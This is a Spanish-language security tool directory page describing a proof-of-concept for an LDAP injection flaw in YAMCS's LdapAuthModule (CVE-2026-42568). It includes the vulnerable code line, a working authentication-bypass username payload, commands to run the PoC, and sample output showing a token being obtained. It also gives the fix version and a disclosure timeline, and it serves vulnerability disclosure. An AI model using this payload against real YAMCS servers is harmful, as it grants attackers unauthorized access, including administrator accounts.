Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-42568 — Existe una vulnerabilidad de inyección LDAP en org.yamcs.security.LdapAuthModule. El parámetro username se inserta directamente en los filtros de búsqueda LDAP sin escape RFC 4515, permitiendo la evasión de autenticación. | Kitploit
Herramientas/GitHubGitHub/ex-cal1bur/cve-2026-42568
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónAprendizaje y Educación
GitHubex-cal1bur/cve-2026-42568

CVE-2026-42568

Existe una vulnerabilidad de inyección LDAP en org.yamcs.security.LdapAuthModule. El parámetro username se inserta directamente en los filtros de búsqueda LDAP sin escape RFC 4515, permitiendo la evasión de autenticación.

Ver Repositorio
1hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-42568 — Inyección LDAP en LdapAuthModule de YAMCS

Resumen

Existe una vulnerabilidad de inyección LDAP en org.yamcs.security.LdapAuthModule. El parámetro de nombre de usuario se inserta directamente en los filtros de búsqueda LDAP sin escape según RFC 4515, lo que permite omitir la autenticación.

CampoValor
CVECVE-2026-42568
GravedadMEDIA
CWECWE-90: Neutralización incorrecta de elementos especiales en consultas LDAP
Afectadoyamcs-core < 5.12.7 (con autenticación LDAP configurada)
Corregido enyamcs-core 5.12.7
AvisoGHSA-cqh3-jg8p-336j

Detalles de la vulnerabilidad

Causa raíz (LdapAuthModule.java):

root@kitploit:~
var filter = userFilter.replace("{0}", username);
// username inserted directly — no RFC 4515 escaping

Con un userFilter típico de (uid={0}), un nombre de usuario malicioso rompe la estructura del filtro:

root@kitploit:~
Entrada:  *)(uid=*))(|(uid=*
Filtro: (uid=*)(uid=*))(|(uid=*)
Resultado: Coincidencia universal — autenticación omitida

Prueba de concepto

root@kitploit:~
pip install requests
python3 poc.py http://localhost:8090

Salida esperada en una instancia vulnerable (con LDAP configurado):

root@kitploit:~
[1] Bypass universal (cualquier cuenta)
     Usuario: *)(uid=*))(|(uid=*
     Contraseña: cualquier cosa
     Resultado:   HTTP 200
     [!!!] AUTENTICACIÓN OMITIDA
     [!!!] Token recibido: eyJhbGciOiJSUzI1NiJ9...

Nota: Esta vulnerabilidad solo afecta a instancias de YAMCS con LdapAuthModule configurado. Las instalaciones predeterminadas que usan autenticación integrada no se ven afectadas.

Impacto

Un atacante no autenticado que pueda alcanzar el servidor YAMCS puede omitir completamente la autenticación cuando LDAP está configurado, obteniendo acceso como cualquier usuario, incluidos los administradores.

Solución

Actualizar a yamcs-core >= 5.12.7.

La corrección aplica escape RFC 4515 al nombre de usuario antes de construir el filtro LDAP.

Cronología

FechaEvento
2026-05Vulnerabilidad reportada
2026-05-26Corrección publicada en yamcs-core 5.12.7
2026-05-26Aviso público publicado

Investigador

Daniel Miranda Barcelona (Excal1bur)

  • GitHub: https://github.com/ex-cal1bur
  • LinkedIn: https://linkedin.com/in/daniel-miranda-barcelona
  • Blog: https://thedumpster.es
Descargar herramienta